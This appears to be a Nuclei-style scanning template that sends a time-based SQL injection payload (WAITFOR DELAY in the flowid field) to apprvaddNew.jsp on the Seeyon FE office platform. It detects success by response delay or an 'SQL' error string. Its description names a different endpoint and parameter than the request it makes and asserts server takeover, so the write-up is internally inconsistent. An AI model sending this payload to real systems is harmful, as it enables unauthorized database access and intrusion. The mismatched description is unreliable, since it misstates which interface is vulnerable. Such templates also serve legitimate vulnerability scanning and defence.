id: 致远互联FE协作办公平台 apprvaddNew.jsp SQL注入

info:
  name: 致远互联FE协作办公平台 apprvaddNew.jsp SQL注入
  author: admin
  severity: high
  description: 在受影响的版本中，攻击者可以通过未授权访问 /ncchr/pm/obj/queryPsnInfo 接口，利用 staffid 参数的缺乏校验，通过传入恶意的 SQL 语句进行命令注入，从而控制服务器。

requests:
  - method: POST
    path:
      - "{{BaseURL}}/witapprovemanage/apprvaddNew.jsp"

    headers:
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36

    body: |
      flowid=1';WAITFOR+DELAY+'0:0:5'--

    matchers:
      - type: word
        words:
          - "SQL"  # Adjust this based on known error messages if applicable

      - type: dsl
        dsl:
          - "response.time > 5000"  # Check if the response time is greater than 5 seconds